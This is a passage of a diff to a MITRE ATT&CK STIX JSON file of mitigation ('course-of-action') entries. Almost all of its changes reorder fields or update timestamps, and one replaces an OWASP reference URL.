@@ -182934,8 +210770,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.194Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--8b36d944-f274-4d46-9acd-dbba6927ce7a",
@@ -182980,8 +210816,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.869Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--a90da496-b460-47e8-92e7-cc36eb00bd9a",
@@ -183001,8 +210837,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:31:59.090Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--12c13879-b7bd-4bc5-8def-aacec386d432",
@@ -183027,8 +210863,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:32:22.755Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--af093bc8-7b59-4e2a-9da8-8e839b4c50c6",
@@ -183048,8 +210884,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:32:44.821Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -183099,8 +210935,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:33:10.069Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--cdecc44a-1dbf-4c1f-881c-f21e3f47272a",
@@ -183125,8 +210961,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:33:35.477Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--9a902722-cecd-4fbe-a6c9-49333aa0f8c2",
@@ -183171,8 +211007,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.921Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--effb83a0-ead1-4b36-b7f6-b7bdf9c4616e",
@@ -183227,8 +211063,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.877Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--46acc565-11aa-40ba-b629-33ba0ab9b07b",
@@ -183273,8 +211109,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:24.247Z",
"created": "2019-04-24T16:59:33.603Z",
- "x_mitre_deprecated": true,
- "x_mitre_version": "1.0"
+ "x_mitre_version": "1.0",
+ "x_mitre_deprecated": true
},
{
"id": "course-of-action--987988f0-cf86-4680-a875-2f6456ab2448",
@@ -183292,11 +211128,14 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"type": "course-of-action",
- "modified": "2020-03-31T13:11:05.677Z",
+ "modified": "2020-05-20T15:12:39.136Z",
"created": "2019-06-06T20:54:49.964Z",
"x_mitre_version": "1.1"
},
{
+ "created": "2019-06-11T17:00:01.740Z",
+ "modified": "2019-06-11T17:00:01.740Z",
+ "type": "course-of-action",
"id": "course-of-action--e8242a33-481c-4891-af63-4cf3e4cf6aff",
"description": "Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.",
"name": "Restrict Library Loading",
@@ -183311,12 +211150,12 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "type": "course-of-action",
- "modified": "2019-06-11T17:00:01.740Z",
- "created": "2019-06-11T17:00:01.740Z",
"x_mitre_version": "1.0"
},
{
+ "created": "2019-06-06T20:58:59.577Z",
+ "modified": "2019-06-06T20:58:59.577Z",
+ "type": "course-of-action",
"id": "course-of-action--a2c36a5d-4058-475e-8e77-fff75e50d3b9",
"description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
"name": "Restrict Registry Permissions",
@@ -183331,12 +211170,12 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "type": "course-of-action",
- "modified": "2019-06-06T20:58:59.577Z",
- "created": "2019-06-06T20:58:59.577Z",
"x_mitre_version": "1.0"
},
{
+ "created": "2019-06-06T20:52:59.206Z",
+ "modified": "2019-06-06T20:52:59.206Z",
+ "type": "course-of-action",
"id": "course-of-action--21da4fd4-27ad-4e9c-b93d-0b9b14d02c96",
"description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
"name": "Restrict Web-Based Content",
@@ -183351,9 +211190,6 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "type": "course-of-action",
- "modified": "2019-06-06T20:52:59.206Z",
- "created": "2019-06-06T20:52:59.206Z",
"x_mitre_version": "1.0"
},
{
@@ -183399,8 +211235,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.192Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--8c918d8a-11c5-4ffd-af10-e74bc06bdfae",
@@ -183425,8 +211261,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:36:40.673Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -183471,8 +211307,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.880Z",
"created": "2019-04-12T14:59:36.522Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--b91c2f9e-c1a0-44df-95f0-9e7c9d1d5e55",
@@ -183512,8 +211348,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:37:35.427Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--ef273807-c465-4728-9cee-5823422f42ee",
@@ -183538,8 +211374,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:38:03.304Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--41cff8e9-fd05-408e-b3d5-d98c54c20bcf",
@@ -183564,10 +211400,13 @@
"type": "course-of-action",
"modified": "2019-07-25T11:38:28.944Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
+ "created": "2019-06-06T20:15:34.146Z",
+ "modified": "2019-06-06T20:15:34.146Z",
+ "type": "course-of-action",
"id": "course-of-action--7bb5fae9-53ad-4424-866b-f0ea2a8b731d",
"description": "Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.",
"name": "SSL/TLS Inspection",
@@ -183582,9 +211421,6 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "type": "course-of-action",
- "modified": "2019-06-06T20:15:34.146Z",
- "created": "2019-06-06T20:15:34.146Z",
"x_mitre_version": "1.0"
},
{
@@ -183645,8 +211481,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.257Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--1c0711c8-2a73-48a1-893d-ff88bcd23824",
@@ -183671,8 +211507,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:39:28.002Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--51b37302-b844-4c08-ac98-ae6955ed1f55",
@@ -183717,8 +211553,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:24.643Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--9da16278-c6c5-4410-8a6b-9c16ce8005b3",
@@ -183743,8 +211579,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:40:31.541Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--57019a80-8523-46b6-be7d-f763a15a2cc6",
@@ -183774,8 +211610,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:40:52.342Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"object_marking_refs": [
@@ -183820,8 +211656,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.262Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--9e57c770-5a39-49a2-bb91-253ba629e3ac",
@@ -183851,8 +211687,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:41:39.946Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"object_marking_refs": [
@@ -183897,8 +211733,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:24.245Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--9378f139-10ef-4e4b-b679-2255a0818902",
@@ -183933,8 +211769,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:24.258Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -183954,8 +211790,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:42:52.240Z",
"created": "2019-04-24T17:01:10.433Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--073cc04d-ac46-4f5a-85d7-83a91ecd6a19",
@@ -183975,8 +211811,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:43:19.870Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--43b366a4-b5ff-4d4e-8a3b-f09a9d2faff5",
@@ -184006,8 +211842,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:43:54.859Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--a13e35cc-8c90-4d77-a965-5461042c1612",
@@ -184057,8 +211893,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.907Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--51048ba0-a5aa-41e7-bf5d-993cd217dfb2",
@@ -184078,8 +211914,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:45:01.486Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -184144,8 +211980,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:24.233Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--5391ece4-8866-415d-9b5e-8dc5944f612a",
@@ -184165,8 +212001,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:45:45.651Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--02f0f92a-0a51-4c94-9bda-6437b9a93f22",
@@ -184186,8 +212022,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:46:32.010Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--8f6b5ca6-263a-4ea9-98f3-afd2a3cd8119",
@@ -184207,8 +212043,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:50:34.690Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--ad7f983d-d5a8-4fce-a38c-b68eda61bf4e",
@@ -184228,8 +212064,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:59:46.032Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--c861bcb1-946f-450d-ab75-d4e3c1103a56",
@@ -184249,8 +212085,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:00:12.285Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--a766ce73-5583-48f3-b7c0-0bb43c6ef8c7",
@@ -184275,8 +212111,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:01:13.198Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--399d9038-b100-43ef-b28d-a5065106b935",
@@ -184301,8 +212137,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:01:33.997Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--94927849-03e3-4a07-8f4c-9ee21b626719",
@@ -184322,8 +212158,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:01:55.766Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -184348,8 +212184,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:02:27.102Z",
"created": "2019-04-24T17:02:25.107Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--dbf0186e-722d-4a0a-af6a-b3460f162f84",
@@ -184369,8 +212205,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:02:48.931Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--23bff3ce-021c-4e7a-9aee-60fd40bc7c6c",
@@ -184390,8 +212226,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:03:12.876Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--97d8eadb-0459-4c1d-bf1a-e053bd75df61",
@@ -184416,7 +212252,7 @@
},
{
"description": "OWASP. (2017, April 16). OWASP Top 10 2017 - The Ten Most Critical Web Application Security Risks. Retrieved February 12, 2019.",
- "url": "https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf",
+ "url": "https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/",
"source_name": "OWASP Top 10 2017"
}
],
@@ -184424,10 +212260,10 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"type": "course-of-action",
- "modified": "2019-07-25T12:04:31.644Z",
+ "modified": "2020-07-14T22:23:56.006Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"object_marking_refs": [
@@ -184452,8 +212288,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:06:06.231Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"object_marking_refs": [
@@ -184498,8 +212334,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:24.235Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--684feec3-f9ba-4049-9d8f-52d52f3e0e40",
@@ -184544,8 +212380,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.705Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--c1676218-c16a-41c9-8f7a-023779916e39",
@@ -184590,8 +212426,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.266Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"object_marking_refs": [
@@ -184636,8 +212472,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.903Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--d8787791-d22e-45bb-a9a8-251d8d0a1ff2",
@@ -184682,8 +212518,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.699Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--82d8e990-c901-4aed-8596-cc002e7eb307",
@@ -184728,8 +212564,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:24.239Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -184749,8 +212585,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:26:37.946Z",
"created": "2019-04-23T20:33:09.318Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--f0a42cad-9b1f-44da-a672-718f18381018",
@@ -184795,8 +212631,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:26:58.596Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--c7e49501-6021-414f-bfa1-94519d8ec314",
@@ -184826,8 +212662,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:27:19.577Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--160af6af-e733-4b6a-a04a-71c620ac0930",
@@ -184847,8 +212683,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:27:40.782Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -184908,8 +212744,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.703Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--5c167af7-c2cb-42c8-ae67-3fb275bf8488",
@@ -184954,8 +212790,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:24.250Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -184975,8 +212811,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:28:59.970Z",
"created": "2019-04-24T17:03:39.689Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--809b79cd-be78-4597-88d1-5496d1d9993a",
@@ -184996,8 +212832,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:29:22.784Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--797312d4-8a84-4daf-9c56-57da4133c322",
@@ -185017,8 +212853,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:30:35.417Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--e8d22ec6-2236-48de-954b-974d17492782",
@@ -185063,8 +212899,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.676Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--a0d8db1d-a731-4428-8209-c07175f4b1fe",
@@ -185089,8 +212925,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:31:21.118Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -185108,7 +212944,7 @@
"description": "Perform regular software updates to mitigate exploitation risk.",
"id": "course-of-action--e5d930e9-775a-40ad-9bdb-b941d8dfe86b",
"type": "course-of-action",
- "modified": "2019-06-11T17:12:55.207Z",
+ "modified": "2020-07-07T12:42:39.005Z",
"created": "2019-06-11T17:12:55.207Z",
"x_mitre_version": "1.0"
},
@@ -185133,9 +212969,13 @@
"x_mitre_version": "1.1"
},
{
- "id": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317",
- "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
- "name": "User Account Management",
+ "created": "2019-06-06T16:50:58.767Z",
+ "modified": "2020-05-20T13:49:12.270Z",
+ "type": "course-of-action",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -185143,13 +212983,9 @@
"url": "https://attack.mitre.org/mitigations/M1018"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "type": "course-of-action",
- "modified": "2020-03-31T13:11:21.150Z",
- "created": "2019-06-06T16:50:58.767Z",
+ "name": "User Account Management",
+ "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+ "id": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317",
"x_mitre_version": "1.1"
},
{
@@ -185170,8 +213006,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:31:53.804Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--2a4f6c11-a4a7-4cb9-b0ef-6ae1bb3a718a",
@@ -185231,8 +213067,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:32:31.844Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--d9f4b5fa-2a39-4bdf-b40a-ea998933cd6d",
@@ -185277,8 +213113,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.911Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -185296,7 +213132,7 @@
"description": "Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.",
"id": "course-of-action--15437c6d-b998-4a36-be41-4ace3d54d266",
"type": "course-of-action",
- "modified": "2020-03-31T13:11:37.532Z",
+ "modified": "2020-07-14T22:22:06.356Z",
"created": "2019-06-06T16:47:30.700Z",
"x_mitre_version": "1.1"
},
@@ -185323,8 +213159,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:34:04.565Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--bcc91b8c-f104-4710-964e-1d5409666736",
@@ -185349,8 +213185,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:34:23.847Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--308855d1-078b-47ad-8d2a-8f9b2713ffb5",
@@ -185395,8 +213231,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.710Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--0bc3ce00-83bc-4a92-a042-79ffbc6af259",
@@ -185421,8 +213257,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:35:09.565Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025",
@@ -185447,8 +213283,8 @@
"type": "course-of-action",
